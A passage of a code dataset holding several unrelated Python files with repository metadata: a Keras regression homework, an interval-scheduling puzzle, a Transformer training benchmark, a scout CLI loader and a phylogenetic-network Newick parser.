'C:\\\\Users\\\\rarraiz\\\\Desktop\\\\Machine Learning\\\\Insumos\\\\concrete_data.csv'\r\ndf = pd.read_csv(file)\r\n\r\n'''Veamos las dimensiones'''\r\ndf.shape\r\n\r\n'''Estadisticas Descriptivas'''\r\ndf.describe()\r\n\r\n'''Revisar Valores Nulos'''\r\ndf.isnull().sum()\r\n\r\n'''Objetivo'''\r\ntarget = 'Strength'\r\n\r\nX = df.copy()\r\n\r\ny = X.pop(target)\r\n\r\nn_cols = X.shape[1]\r\ninput_shape = (n_cols)\r\n\r\n'''\r\nPart A: Build a baseline model (5 marks)'''\r\n\r\n'''Build a Neural Network'''\r\n\r\n\r\n# define regression model\r\ndef regression_model(network_arch,\r\n input_shape,\r\n optimizer=\"adam\",\r\n loss=\"mean_squared_error\",\r\n ):\r\n \"\"\"\r\n Function to build the regression model\r\n\r\n parameters:\r\n -----------\r\n - network_arch: dictionary with the following structure\r\n {\"layer_1\": {\"u_units\": n, \"activation\": activation},\r\n ...\r\n \"layer_n\": {\"u_units\"}\r\n }\r\n - input_shape: tuple with the shape of the input\r\n - optimizer: string, name of the optimizer to use\r\n - loss: string, name of the loss function to minimize\r\n\r\n returns:\r\n --------\r\n - A compiled model\r\n \"\"\"\r\n\r\n # create model\r\n model = Sequential()\r\n\r\n nlayers = len(network_arch)\r\n final_layer = \"layer_\" + str(nlayers)\r\n\r\n for k, layer in network_arch.items():\r\n n_units = layer.get(\"n_units\")\r\n activation = layer.get(\"activation\")\r\n if k == \"layer_1\":\r\n model.add(Dense(n_units, activation=activation, input_shape=input_shape))\r\n elif k == final_layer:\r\n model.add(Dense(n_units))\r\n else:\r\n model.add(Dense(n_units, activation=activation))\r\n\r\n # compile model\r\n model.compile(optimizer=optimizer, loss=loss)\r\n\r\n return model\r\n\r\n# model architecture\r\nmodel_architecture1 = {\"layer_1\": {\"n_units\": 10, \"activation\": \"relu\"},\r\n \"layer_2\": {\"n_units\": 1},\r\n }\r\n\r\nprint()\r\nprint(\"input_shape = {}\".format(input_shape))\r\nprint(\"network_config = {}\".format(model_architecture1))\r\nprint()\r\n\r\n# import the metric to evaluate the model performance\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n\r\n# Define a function for the loops\r\ndef train_and_test_several_models(X, y,\r\n test_size,\r\n model_arch,\r\n input_shape,\r\n optimizer,\r\n loss,\r\n niterations,\r\n epochs,\r\n pred_norm=False,\r\n seed=345,\r\n verbose=2,\r\n ):\r\n \"\"\"\r\n Function for training and testing several model on random train/test splits\r\n\r\n parameters:\r\n -----------\r\n - X,y: the data. X are the predictors and y the target\r\n - seed: int, with a seed to be used in the train/test splitting\r\n - test_size: float (0,0.5). Size of the test-sample as a fraction of the whole data-set\r\n - model_arch: dict. Architecture of the model (see regression_model above)\r\n - input_shape: 2-tuple with the input shape\r\n - optimizer: string. optimizer name\r\n - loss: string. loss function name\r\n - niterations: int. number of iterations to perform the train/test split, model training and testing\r\n - epoch: int. number of epochs for model training\r\n - pred_norm: bool. If True will apply normalization on the predictors\r\n - verbose: int >= 0. level of verbosity.\r\n\r\n returns:\r\n --------\r\n - mse_results: np.array with the sqrt(mse) metric evaluated on the test-samples\r\n \"\"\"\r\n\r\n # Array to store the results of the model evaluation on the test set\r\n metric_list = np.zeros(niterations)\r\n\r\n print()\r\n print(\"Launching {} iterations of\".format(niterations))\r\n print(\" - train/test split => test_size = {}\".format(test_size))\r\n if pred_norm:\r\n print(\" - Apply predictors normalization\")\r\n else:\r\n print(\" - No predictors normalization\")\r\n print(\" - model architecture: {}\".format(model_arch))\r\n print(\" - model training:\")\r\n print(\" * epochs = {}\".format(epochs))\r\n print(\" * optimizer = {}\".format(optimizer))\r\n print(\" * loss = {}\".format(loss))\r\n print()\r\n\r\n # Start the loop\r\n for i in range(niterations):\r\n # Apply the train test split\r\n myseed = seed + i * 2 # seed used for the train_test_split\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=myseed)\r\n\r\n # Start by building the model\r\n model = regression_model(network_arch=model_arch,\r\n input_shape=input_shape,\r\n optimizer=optimizer,\r\n loss=loss)\r\n\r\n if pred_norm:\r\n # If requested apply predictors normalization\r\n # first calculate the mean and std on the train-sample\r\n X_train_mean = X_train.mean()\r\n X_train_std = X_train.std()\r\n\r\n # then apply them on both, the train and test samples\r\n X_train = (X_train - X_train_mean) / X_train_std\r\n X_test = (X_test - X_train_mean) / X_train_std\r\n\r\n myverbose = 0\r\n if i == 0:\r\n myverbose = verbose\r\n print(\"Train/test splitting for iteration {}\".format(i + 1))\r\n print(\" X_train.shape = {}\".format(X_train.shape))\r\n print(\" y_train.shape = {}\".format(y_train.shape))\r\n print(\" X_test.shape = {}\".format(X_test.shape))\r\n print(\" y_test.shape = {}\".format(y_test.shape))\r\n print(X_train.head())\r\n print()\r\n print(\"Model summary for iteration {}\".format(i + 1))\r\n model.summary()\r\n print()\r\n print()\r\n\r\n # Model training\r\n model.fit(X_train, y_train, epochs=epochs, verbose=verbose)\r\n\r\n # model predictions on test sample\r\n y_pred = model.predict(X_test)\r\n\r\n # Model evaluation on test sample\r\n result = np.sqrt(mean_squared_error(y_test, y_pred))\r\n print(\"{}: sqrt(mse) = {}\".format(i + 1, result))\r\n metric_list[i] = result\r\n\r\n print()\r\n\r\n return metric_list\r\n\r\nniterations = 50 # Number of iterations\r\ntest_size = 0.3 # test sample size\r\n\r\nsq_mse_list_A = train_and_test_several_models(X = X,\r\n y = y,\r\n test_size = test_size,\r\n model_arch = model_architecture1,\r\n input_shape = input_shape,\r\n optimizer = \"adam\",\r\n loss = \"mean_squared_error\",\r\n niterations = niterations,\r\n epochs = 50,\r\n seed = 345,\r\n verbose = 0,\r\n pred_norm = False,\r\n )\r\n\r\n# Calculate the mean and the standard deviation of the metric on the 50 samplings\r\nmean_sqmse_A = np.mean(sq_mse_list_A)\r\nstd_sqmse_A = np.std(sq_mse_list_A)\r\n\r\n# Generate a data frame to store the results of the differents parts of this project\r\ndf_results = pd.DataFrame.from_dict({\"Part\": [\"A\"],\"mean_sq_mse\": [mean_sqmse_A], \"std_sq_mse\": [std_sqmse_A]})\r\ndf_results\r\n\r\n# Define some common parameters for plotting\r\nfigsize = (10,8)\r\nnbins = 20\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef plot_results(result_list,\r\n label_list,\r\n var_name=\"sq(mse)\",\r\n figsize=(15, 10),\r\n nbins=10):\r\n \"\"\"\r\n plotting function\r\n\r\n parameters:\r\n -----------\r\n - result_list: list of np.arrays with the metrics of the niterations\r\n - label_list: list of labels\r\n \"\"\"\r\n\r\n if len(result_list) != len(label_list):\r\n raise ValueError(\"lenghts of result_list and label_list has to be the same\")\r\n\r\n if len(result_list) == 0:\r\n raise ValueError(\"lenght of result_list has to be > 0\")\r\n\r\n color_list = [\"b\", \"r\", \"m\", \"y\"]\r\n\r\n xmin = +1.0e+20\r\n xmax = -1.0e+20\r\n for arr in result_list:\r\n min_tmp = np.amin(arr)\r\n max_tmp = np.amax(arr)\r\n\r\n if xmin > min_tmp:\r\n xmin = min_tmp\r\n if xmax < max_tmp:\r\n xmax = max_tmp\r\n\r\n percent = 0.01\r\n delta = xmax - xmin\r\n xmin -= percent * delta\r\n xmax += percent * delta\r\n\r\n bins = np.linspace(xmin, xmax, nbins + 1)\r\n\r\n fig, ax = plt.subplots(nrows=1, ncols=1, figsize=figsize)\r\n\r\n porcent = 0.05\r\n ymax = -1.0e+20\r\n for i, arr in enumerate(result_list):\r\n n, _, _ = ax.hist(x=arr,\r\n bins=bins,\r\n color=color_list[i],\r\n alpha=0.5,\r\n density=False,\r\n label=label_list[i]\r\n )\r\n\r\n if ymax < np.amax(n):\r\n ymax = np.amax(n)\r\n\r\n # Add some text for labels, title and custom x-axis tick labels, etc.\r\n ax.legend()\r\n ax.set_xlim([bins[0], bins[-1]])\r\n ax.set_ylim([0, ymax * (1.0 + porcent)])\r\n ax.set_xlabel(var_name)\r\n ax.set_ylabel('Occurences')\r\n ax.set_title(var_name + ' distribution')\r\n\r\n fig.tight_layout()\r\n\r\n plt.show()\r\n\r\n '''Part B: Normalize the data (5 marks)'''\r\n\r\n # Just launch the function above (train_and_test_several_models), but with pred_norm = True\r\n sq_mse_list_B = train_and_test_several_models(X=X,\r\n y=y,\r\n test_size=test_size,\r\n model_arch=model_architecture1,\r\n input_shape=input_shape,\r\n optimizer=\"adam\",\r\n loss=\"mean_squared_error\",\r\n niterations=niterations,\r\n epochs=50,\r\n seed=3675,\r\n verbose=0,\r\n pred_norm=True,\r\n )\r\n\r\n # Calculate the mean and the standard deviation of the metric on the 50 samplings\r\n mean_sqmse_B = np.mean(sq_mse_list_B)\r\n std_sqmse_B = np.std(sq_mse_list_B)\r\n\r\n df_results.loc[df_results.shape[0]] = [\"B\", mean_sqmse_B, std_sqmse_B]\r\n df_results\r\n\r\n plot_results(result_list=[sq_mse_list_A, sq_mse_list_B],\r\n label_list=[\"Part A\", \"Part B\"],\r\n var_name=\"sq(mse)\",\r\n figsize=figsize,\r\n nbins=nbins)\r\n\r\n '''Part C: Increate the number of epochs (5 marks)'''\r\n\r\n # Just launch the function above (train_and_test_several_models), but with pred_norm = True and epochs = 100\r\n sq_mse_list_C = train_and_test_several_models(X=X,\r\n y=y,\r\n test_size=test_size,\r\n model_arch=model_architecture1,\r\n input_shape=input_shape,\r\n optimizer=\"adam\",\r\n loss=\"mean_squared_error\",\r\n niterations=niterations,\r\n epochs=100,\r\n seed=3675,\r\n verbose=0,\r\n pred_norm=True,\r\n )\r\n\r\n # Calculate the mean and the standard deviation of the metric on the 50 samplings\r\n mean_sqmse_C = np.mean(sq_mse_list_C)\r\n std_sqmse_C = np.std(sq_mse_list_C)\r\n\r\n df_results.loc[df_results.shape[0]] = [\"C\", mean_sqmse_C, std_sqmse_C]\r\n df_results\r\n\r\n plot_results(result_list=[sq_mse_list_A, sq_mse_list_B, sq_mse_list_C],\r\n label_list=[\"Part A\", \"Part B\", \"Part C\"],\r\n var_name=\"sq(mse)\",\r\n figsize=figsize,\r\n nbins=nbins)\r\n\r\n '''Part D: Increase the number of hidden layers (5 marks)'''\r\n\r\n # Define the new architecture\r\n # model architecture\r\n model_architecture2 = {\"layer_1\": {\"n_units\": 10, \"activation\": \"relu\"},\r\n \"layer_2\": {\"n_units\": 10, \"activation\": \"relu\"},\r\n \"layer_3\": {\"n_units\": 10, \"activation\": \"relu\"},\r\n \"layer_4\": {\"n_units\": 1},\r\n }\r\n\r\n print()\r\n print(\"input_shape = {}\".format(input_shape))\r\n print(\"network_config = {}\".format(model_architecture2))\r\n print()\r\n\r\n # Just launch the function above (train_and_test_several_models), but with pred_norm = True\r\n # and model_arch = model_architecture2 and epochs = 100\r\n sq_mse_list_D = train_and_test_several_models(X=X,\r\n y=y,\r\n test_size=test_size,\r\n model_arch=model_architecture2,\r\n input_shape=input_shape,\r\n optimizer=\"adam\",\r\n loss=\"mean_squared_error\",\r\n niterations=niterations,\r\n epochs=50,\r\n seed=3675,\r\n verbose=0,\r\n pred_norm=True,\r\n )\r\n\r\n # Calculate the mean and the standard deviation of the metric on the 50 samplings\r\n mean_sqmse_D = np.mean(sq_mse_list_D)\r\n std_sqmse_D = np.std(sq_mse_list_D)\r\n\r\n df_results.loc[df_results.shape[0]] = [\"D\", mean_sqmse_D, std_sqmse_D]\r\n df_results\r\n\r\n plot_results(result_list=[sq_mse_list_A, sq_mse_list_B, sq_mse_list_C, sq_mse_list_D],\r\n label_list=[\"Part A\", \"Part B\", \"Part C\", \"Part D\"],\r\n var_name=\"sq(mse)\",\r\n figsize=figsize,\r\n nbins=nbins)\r\n\r\n","repo_name":"Raalejoo/Build-a-Regression-Model-in-Keras","sub_path":"Keras.py","file_name":"Keras.py","file_ext":"py","file_size_in_byte":15277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1908430394","text":"'''\n\nKMIT hosting a Keshav Memorial Badminton League. They planned to conduct\nN number of games. Each game begin and ends in perticular time slot.\n\nYou are given an array of time slots of the N games, consisting of\nbegin and end times (b1,e1),(b2,e2),... (b < e ).\nYour task is to determine minimum number of badminton courts required \nto conduct all the games smoothly.\n\nNOTE: If a game begins at time 'a' ends at time 'b', \nanother game can start at 'b'.\n\nInput Format:\n-------------\nLine-1: An integer N, number of games.\nNext N lines: Two space separated integers, begin and end time of each game.\n\nOutput Format:\n--------------\nPrint an integer, minimum number of badminton courts required.\n\n\nSample Input-1:\n---------------\n3\n0 30\n5 10\n15 20\n\nSample Output-1:\n----------------\n2\n\nSample Input-2:\n---------------\n3\n0 10\n15 25\n25 35\n\nSample Output-2:\n----------------\n1\n\n\n\n'''\n\n#Solution\n\ndef BadmintonCourts(intervals):\n start = sorted([i[0] for i in intervals])\n end = sorted([i[1] for i in intervals])\n \n s = 0\n e = 0\n count = 0\n res = 0\n\n while s < len(start):\n if start[s] < end[e]:\n count += 1\n s += 1\n else:\n count -= 1\n e += 1\n res = max(res, count)\n return res\nn=int(input())\nintervals=[]\nfor i in range(n):\n row=list(map(int,input().split()))\n intervals.append(row)\nprint(BadmintonCourts(intervals))","repo_name":"sharuk2k3/FS-Elite-2021-22","sub_path":"Day-27/Day_27_P_1.py","file_name":"Day_27_P_1.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"22672685746","text":"import functools\nimport warnings\n\nimport yaml\nimport utils\nfrom utils.sync_control import *\nimport numpy as np\nimport torch\nimport time\nimport torch.nn as nn\nimport torch.optim as optim\nfrom utils.sync_info import BasicSyncInfo, ConcurrentSyncInfo\nimport yaml\nimport transformer.lamb as lamb\nfrom transformer.data_utils import *\nfrom transformer.mem_transformer import MemTransformerLM\nimport sys\nimport os\n# try:\n# from apex import amp\n# except ModuleNotFoundError:\n# warnings.warn('APEX AMP is unavailable')\n\n\ndataset = 'wt103'\nvocab = 'word'\n\ndef init_weight(weight, model_consts):\n # if init == 'uniform':\n # nn.init.uniform_(weight, -0.1, 0.1)\n # elif init == 'normal':\n nn.init.normal_(weight, 0.0, model_consts['init_std'])\n\n\ndef init_bias(bias):\n nn.init.constant_(bias, 0.0)\n\n\ndef weights_init(m, model_consts):\n proj_init_std = 0.01\n classname = m.__class__.__name__\n if classname.find('Linear') != -1:\n if hasattr(m, 'weight') and m.weight is not None:\n init_weight(m.weight, model_consts)\n if hasattr(m, 'bias') and m.bias is not None:\n init_bias(m.bias)\n elif classname.find('AdaptiveEmbedding') != -1:\n if hasattr(m, 'emb_projs'):\n for i in range(len(m.emb_projs)):\n if m.emb_projs[i] is not None:\n nn.init.normal_(m.emb_projs[i], 0.0, proj_init_std)\n elif classname.find('Embedding') != -1:\n if hasattr(m, 'weight'):\n init_weight(m.weight, model_consts)\n elif classname.find('ProjectedAdaptiveLogSoftmax') != -1:\n if hasattr(m, 'cluster_weight') and m.cluster_weight is not None:\n init_weight(m.cluster_weight, model_consts)\n if hasattr(m, 'cluster_bias') and m.cluster_bias is not None:\n init_bias(m.cluster_bias)\n if hasattr(m, 'out_projs'):\n for i in range(len(m.out_projs)):\n if m.out_projs[i] is not None:\n nn.init.normal_(m.out_projs[i], 0.0, proj_init_std)\n if hasattr(m, 'out_layers_weights'):\n for i in range(len(m.out_layers_weights)):\n if m.out_layers_weights[i] is not None:\n init_weight(m.out_layers_weights[i], model_consts)\n elif classname.find('LayerNorm') != -1:\n if hasattr(m, 'weight'):\n nn.init.normal_(m.weight, 1.0, model_consts['init_std'])\n if hasattr(m, 'bias') and m.bias is not None:\n init_bias(m.bias)\n elif classname.find('TransformerLM') != -1:\n if hasattr(m, 'r_emb'):\n init_weight(m.r_emb, model_consts)\n if hasattr(m, 'r_w_bias'):\n init_weight(m.r_w_bias, model_consts)\n if hasattr(m, 'r_r_bias'):\n init_weight(m.r_r_bias, model_consts)\n if hasattr(m, 'r_bias'):\n init_bias(m.r_bias)\n\n\ndef setup(model_config, shared_config, device):\n # Before we do anything with models, we want to ensure that we get fp16\n # execution of torch.einsum in APEX AMP.\n # Otherwise it'll default to \"promote\" mode, and we'll get fp32 operations.\n # Note that running `--apex_amp_opt_level O2` will remove the need for this\n # code, but it is still valid.\n # if 'apex' in sys.modules:\n # amp.register_half_function(torch, 'einsum')\n\n\n arch = model_config['arch']\n with open(f\"{os.path.expanduser( '~' )}/orion/related/baselines/transformer/transformer_consts.yaml\", 'r') as file:\n model_consts = yaml.load(file, Loader=yaml.FullLoader)[arch]\n\n batch_size = model_config['batch_size']\n\n ext_len = 0\n\n # adaptive softmax / embedding\n cutoffs, tie_projs = [], [False]\n if model_consts['adaptive']:\n cutoffs = [19997, 39997, 199997]\n tie_projs += [True] * len(cutoffs)\n sample_softmax = -1\n MemTransformerLM_kwargs = {\n 'n_token': 267735,\n 'n_layer': model_consts['n_layer'],\n 'n_head': model_consts['n_head'],\n 'd_model': model_consts['d_model'],\n 'd_head': model_consts['d_head'],\n 'd_inner': model_consts['d_inner'],\n 'dropout': model_consts['dropout'],\n 'dropatt': model_consts['dropatt'],\n 'dtype': None,\n 'tie_weight': True,\n 'd_embed': model_consts['d_model'],\n 'div_val': model_consts['div_val'],\n 'tie_projs': tie_projs,\n 'pre_lnorm': False,\n 'tgt_len': model_consts['tgt_len'],\n 'ext_len': ext_len,\n 'mem_len': model_consts['mem_len'],\n 'cutoffs': cutoffs,\n 'same_length': False,\n 'attn_type': 0,\n 'clamp_len': -1,\n 'sample_softmax': sample_softmax,\n }\n\n # MemTransformerLM_kwargs = {\n # 'n_token': 267735,\n # 'n_layer': 16,\n # 'n_head': 8,\n # 'd_model': 512,\n # 'd_head': 64,\n # 'd_inner': 2048,\n # 'dropout': 0.1,\n # 'dropatt': 0.0,\n # 'dtype': None,\n # 'tie_weight': True,\n # 'd_embed': 512,\n # 'div_val': 1,\n # 'tie_projs': [False, True, True, True],\n # 'pre_lnorm': False,\n # 'tgt_len': 192,\n # 'ext_len': 0,\n # 'mem_len': 192,\n # 'cutoffs': [19997, 39997, 199997],\n # 'same_length': False,\n # 'attn_type': 0,\n # 'clamp_len': -1,\n # 'sample_softmax': -1\n # }\n model = MemTransformerLM(**MemTransformerLM_kwargs)\n # model.apply(functools.partial(weights_init, model_consts=model_consts))\n # ensure embedding init is not overridden by out_layer in case of weight sharing\n # model.word_emb.apply(functools.partial(weights_init, model_consts=model_consts))\n\n # jitlamb optimizer\n optimizer = lamb.Lamb(model.parameters(), lr=0.1)\n\n model = model.to(device)\n # scaler = None\n # if model_config['use_fp16']:\n # if model_config['amp'] == 'pytorch':\n # scaler = torch.cuda.amp.GradScaler()\n # elif model_config['amp'] == 'apex':\n # model, optimizer = amp.initialize(\n # model,\n # optimizer,\n # opt_level=model_config['apex_amp_opt_level'],\n # )\n\n\n pin_memory = shared_config['pin_memory']\n data = torch.ones((model_consts['tgt_len'], batch_size), pin_memory=pin_memory).to(torch.int64)\n target = torch.ones((model_consts['tgt_len'], batch_size), pin_memory=pin_memory).to(torch.int64)\n # The later two parts are not used in either training or inference. They are set to align its behavior with real loader.\n virtual_loader = utils.DummyDataLoader(batch=(data, target, 1, 1))\n # else:\n # corpus = get_lm_corpus(datadir=shared_config['wikitext_103_dir'], dataset='wt103', vocab=model_consts['vocab'])\n # tr_iter = corpus.get_iterator('train', batch_size, model_consts['tgt_len'], device=device, ext_len=ext_len)\n # train_iter = tr_iter.get_fixlen_iter()\n # virtual_loader = train_iter\n\n return model, virtual_loader, optimizer\n\n\ndef eval_wrapper(sync_info, tid: int, model_config, shared_config):\n utils.seed_everything(shared_config['seed'])\n device = torch.device(\"cuda:0\")\n\n if 'default' in shared_config and shared_config['default']:\n stream = torch.cuda.default_stream(device=device)\n else:\n if isinstance(sync_info, ConcurrentSyncInfo) and sync_info.isolation_level == 'thread':\n stream = torch.cuda.Stream(device=device, priority=-1 if tid == 0 else 0)\n else:\n stream = torch.cuda.Stream(device=device)\n\n model, data_loader, _ = setup(model_config, shared_config, device)\n model.eval()\n\n num_requests = model_config['num_iterations']\n num_warm_up_reqs = 10\n\n loader_iterator = iter(data_loader)\n\n mems = None\n def eval():\n nonlocal mems\n data, target, _, _ = next(loader_iterator)\n data = data.to(device)\n target = target.to(device)\n _, mems = model(data, target, mems)\n\n utils.measure(eval, num_requests, num_warm_up_reqs, model_config['request_rate'], tid, shared_config, stream, sync_info)\n\n\ndef train_wrapper(sync_info: BasicSyncInfo, tid: int, model_config, shared_config):\n utils.seed_everything(shared_config['seed'])\n device = torch.device(\"cuda:0\")\n\n if 'default' in shared_config and shared_config['default']:\n stream = torch.cuda.default_stream(device=device)\n else:\n if isinstance(sync_info, ConcurrentSyncInfo) and sync_info.isolation_level == 'thread':\n stream = torch.cuda.Stream(device=device, priority=-1 if tid == 0 else 0)\n else:\n stream = torch.cuda.Stream(device=device)\n\n model, data_loader, optimizer = setup(model_config, shared_config, device)\n\n model.train()\n\n # enable_autocast = model_config['use_fp16'] and model_config['amp'] == 'pytorch'\n mem = None\n clip = 0.25\n\n num_iterations = model_config['num_iterations']\n warm_up_iters = 10\n\n\n logging.info(f'transformer is set up with {num_iterations}')\n\n for batch_idx, (data, target, seq_len, _) in enumerate(data_loader):\n start = time.time()\n if batch_idx == warm_up_iters:\n # finish previous work\n stream.synchronize()\n sync_info.pre_measurement_prep(tid)\n # start timer\n start_time = time.time()\n\n data = data.to(device)\n target = target.to(device)\n with ForwardControl(thread_id=tid, batch_idx=batch_idx, sync_info=sync_info, stream=stream):\n with torch.cuda.stream(stream):\n # with torch.cuda.amp.autocast(enable_autocast):\n loss, mem = model(data, target, mem)\n loss = loss.float().mean().type_as(loss)\n\n with BackwardControl(thread_id=tid, batch_idx=batch_idx, sync_info=sync_info, stream=stream):\n with torch.cuda.stream(stream):\n # if model_config['use_fp16']:\n # if model_config['amp'] == 'pytorch':\n # scaler.scale(loss).backward()\n # scaler.unscale_(optimizer)\n # torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n # elif model_config['amp'] == 'apex':\n # with amp.scale_loss(loss, optimizer, delay_unscale=False) as scaled_loss:\n # scaled_loss.backward()\n # torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), clip)\n # else:\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n\n # if model_config['use_fp16'] and model_config['amp'] == 'pytorch':\n # scaler.step(optimizer)\n # scaler.update()\n # else:\n optimizer.step()\n\n if not sync_info.should_continue_loop(tid, batch_idx, num_iterations):\n break\n\n stream.synchronize()\n duration = time.time() - start_time\n sync_info.post_measurement_prep(tid)\n sync_info.write_kv(f'duration-{tid}', duration)\n sync_info.write_kv(f'iterations-{tid}', batch_idx + 1)\n sync_info.write_kv(f'throughput-{tid}', (batch_idx-warm_up_iters)/duration)\n\n logging.info(f'tid {tid} it takes {duration} seconds to train transformer')\n return duration\n","repo_name":"eth-easl/orion","sub_path":"related/baselines/transformer/train_transformer.py","file_name":"train_transformer.py","file_ext":"py","file_size_in_byte":11228,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"42683660159","text":"import logging\n\nimport click\nfrom flask.cli import with_appcontext\n\nLOG = logging.getLogger(__name__)\n\nfrom scout.load import load_institute\nfrom scout.server.extensions import store\n\n\n@click.command('institute', short_help='Load a institute')\n@click.option('-i', '--internal-id',\n required=True)\n@click.option('-d', '--display-name')\n@click.option('-s', '--sanger-recipients', multiple=True)\n@with_appcontext\ndef institute(internal_id, display_name, sanger_recipients):\n \"\"\"\n Create a new institute and add it to the database\n\n \"\"\"\n adapter = store\n\n if not internal_id:\n LOG.warning(\"A institute has to have an internal id\")\n raise click.Abort()\n\n if not display_name:\n display_name = internal_id\n\n if sanger_recipients:\n sanger_recipients = list(sanger_recipients)\n\n try:\n load_institute(\n adapter=adapter,\n internal_id=internal_id,\n display_name=display_name,\n sanger_recipients=sanger_recipients\n )\n except Exception as e:\n LOG.warning(e)\n raise click.Abort()\n","repo_name":"Clinical-Genomics-Lund/scout","sub_path":"scout/commands/load/institute.py","file_name":"institute.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"37186061488","text":"import networkx as nx\nimport ast\nimport os\nimport sys\nimport re\nimport time\n\n##PARAMETERS\nfilename = None\nedges = False\n##\n\n\n\n###############################2. I/O############################\noption_help = False\ni = 1\nwhile i < len(sys.argv):\n arg= sys.argv[i]\n if arg == \"-f\" or arg == \"--filename\":\n i+=1\n filename = str(sys.argv[i])\n if arg == \"-e\" or arg == \"--edges\":\n edges = True\n if arg == \"-h\" or arg == \"--help\":\n option_help = True\n i += 1\n\nif len(sys.argv)==1 or option_help:\n print(\"Mandatory arguments:\\n -f or --filename The file containing two networks \\n\\nOptional arguments:\\n -e or --edges if the input file contains a list of edges in the form [(x1,y1),...,(xn,yn)] with xi and yi integers or strings in the form \\\"string\\\". If this option is not selected, the input is assumed to consist of two newick strings.\")\n sys.exit()\n\n################################################################################\n################################################################################\n################################################################################\n######## #############\n######## Newick Parsing #############\n######## #############\n################################################################################\n################################################################################\n################################################################################\n\n\n# Takes an extended newick string and returns a network\ndef Newick_To_Network(newick):\n #Processing the newick string so it represents a tree, where the tips are the leaves and the reticulation nodes of the network \n newick = newick[:-1]\n newick = newick.replace(\"(\", \"[\")\n newick = newick.replace(\")\", \"]\")\n newick = re.sub(r\"\\]\\#H([\\d]+)\", r\",#R\\1]\", newick)\n newick = re.sub(r\"#([RH])([\\d]+)\", r\"'#\\1\\2'\", newick)\n #Parsing the proccessed string as a list of lists\n nestedtree = ast.literal_eval(newick)\n #Converting the list of lists to a set of edges with root node 1\n edges, leaves, label_set, current_node = NestedList_To_Tree(nestedtree, 1)\n #Add a root edge (0,1)\n edges.append([0, 1])\n ret_labels = dict()\n leaf_labels = dict()\n for l in leaves:\n #leaves are strings, check if they are reticulation nodes\n if len(l) > 2 and (l[:2] == \"#H\" or l[:2] == \"#R\"):\n ret_labels[l[2:]] = []\n else:\n leaf_labels[l] = []\n for l in label_set:\n if len(l[0]) > 2 and (l[0][:2] == \"#H\" or l[0][:2] == \"#R\"):\n if l[0][1] == 'H':\n ret_labels[l[0][2:]] += [l[1]]\n else:\n ret_labels[l[0][2:]] = [l[1]] + ret_labels[l[0][2:]]\n else:\n leaf_labels[l[0]] += [l[1]]\n network = nx.DiGraph()\n network.add_edges_from(edges)\n #Merge corresponding reticulation nodes\n for retic in ret_labels:\n r = ret_labels[retic]\n receiving = r[0]\n parent_receiving = 0\n for p in network.predecessors(receiving):\n parent_receiving = p\n network.remove_node(receiving)\n for v in r[1:]:\n network.add_edge(v, parent_receiving)\n network = nx.contracted_edge(network, (v, parent_receiving))\n network.remove_edge(v, v)\n parent_receiving = v\n #Compute the leaves and their labels\n leaves = set()\n leaf_nodes = dict()\n for l in leaf_labels:\n leaf_labels[l] = leaf_labels[l][0]\n leaf_nodes[leaf_labels[l]] = l\n leaves.add(l)\n #Relabel the nodes\n for node in leaf_nodes:\n leaf_nodes[node] = \"L_\" + str(leaf_nodes[node])\n network = nx.relabel_nodes(network, leaf_nodes)\n #Return the network\n return network\n\n# Subroutine of Newick_To_Network, takes a tree in the form of a nested list, and returns a set of edges with nodes starting at (int) next_node\ndef NestedList_To_Tree(nestedList, next_node):\n edges = []\n leaves = set()\n labels = []\n top_node = next_node\n current_node = next_node + 1\n for t in nestedList:\n edges.append((top_node, current_node))\n if type(t) == list:\n extra_edges, extra_leaves, extra_labels, current_node = NestedList_To_Tree(t, current_node)\n else:\n extra_edges = []\n extra_leaves = set([str(t)])\n extra_labels = [[str(t), current_node]]\n current_node += 1\n edges = edges + extra_edges\n leaves = leaves.union(extra_leaves)\n labels = labels + extra_labels\n return edges, leaves, labels, current_node\n\n\n\n################################################################################\n################################################################################\n################################################################################\n######## #############\n######## Cherry Picking #############\n######## #############\n################################################################################\n################################################################################\n################################################################################\n\n\n#Algorithm 1\ndef FindRP2nd(N, x):\n lst = list()\n for p in N.predecessors(x):\n if N.in_degree(p) == 1:\n for cp in N.successors(p):\n if cp != x:\n t = N.out_degree(cp)\n if t == 0:\n lst.append((cp, x))\n if t == 1:\n for ccp in N.successors(cp):\n if N.out_degree(ccp) == 0:\n lst.append((ccp,x))\n return lst\n\n#algorithm 2\ndef FindRP1st(N, x):\n lst = list()\n for p in N.predecessors(x):\n if N.out_degree(p) == 1:\n for g in N.predecessors(p):\n for cg in N.successors(g):\n if cg != p:\n if N.out_degree(cg) == 0:\n lst.append((x, cg))\n return lst\n\n\n#Checks if two nodes form a cherry (1) or reticulated cherry (2), returns False otherwise\n#Not in the paper\ndef CheckCherry(N, x, y):\n if N.has_node(x) and N.has_node(y):\n px = None\n py = None\n for parent in N.predecessors(x):\n px = parent\n for parent in N.predecessors(y):\n py = parent\n if px == py:\n return 1\n if N.out_degree(px) == 1 and px in N.successors(py):\n return 2\n return False\n\n\n#Algorithm 3\ndef ReducePair(N, x, y):\n k = CheckCherry(N, x, y)\n if k == 1:\n for px in N.predecessors(x):\n N.remove_node(x)\n for ppx in N.predecessors(px):\n N.remove_node(px)\n N.add_edge(ppx,y)\n return True\n if k == 2:\n for px in N.predecessors(x):\n for py in N.predecessors(y):\n N.remove_edge(py,px)\n if N.in_degree(px) == 1:\n for ppx in N.predecessors(px):\n N.add_edge(ppx, x)\n N.remove_node(px)\n #if N.out_degree(py) == 1:\n for ppy in N.predecessors(py):\n N.add_edge(ppy, y)\n N.remove_node(py)\n return True\n return False\n\n\n#Algorithm 4\ndef FindTCS(N):\n lst1 = list()\n for x in N.nodes():\n if N.out_degree(x) == 0:\n 